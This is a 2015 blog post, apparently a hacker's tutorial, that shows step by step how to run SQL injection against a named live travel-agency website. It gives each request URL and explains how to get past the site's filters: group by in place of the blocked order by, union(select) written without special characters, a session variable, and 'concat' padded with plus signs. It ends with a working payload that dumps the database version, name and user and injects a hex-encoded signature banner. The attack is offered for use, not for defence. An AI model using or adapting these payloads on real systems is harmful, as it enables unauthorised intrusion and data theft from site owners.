Tuesday, September 29, 2015

SQLi Challenge Solution 1

First Hello to all :) from D4RK 4NG31

Target : http://exoticindiatours.in/pckge-details.php?id=2

Now, Let's Start

Finding which comment is working

http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 --   ====> no error it's mean comment (--) is working..

-- = # mostly

So, we don't have to use any comment :))

Now it's time to find columns

First we'll use order by

http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked

order by function is blocked.. so, we'll use group by instead of order by

http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> showing error it's mean it's working :D

http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error

http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error

So, The vuln column is 1

Now, time to use union select

http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked

seems Site block special chars (*,!)

Now It's time to do encryption.

For this we'll use union(select

In this .. We'll type columns like this " union(select (1),(2),(3),(4),(5))

Let's try..

http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....

Now it's time to use DIOS

as i already told u concat func is used for print multiple queries

http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))

We get an error... seems site is blocking ( , ) comma

To bypass we'll use variable method :


Let's try this :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat(version(),database(),user()) union(select (@x))

again error

Let's try Waf. First we'll see which word is blocking site :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error

Concat( = Blocked

For this we'll use + with great amount

Let's do it:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++(0x3c703e496e6a6563746564206279204434524b20344e4733313c2f703e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#

Done :) Happy Injecting ;) Tutorial by D4RK 4NG31

No comments:

Post a Comment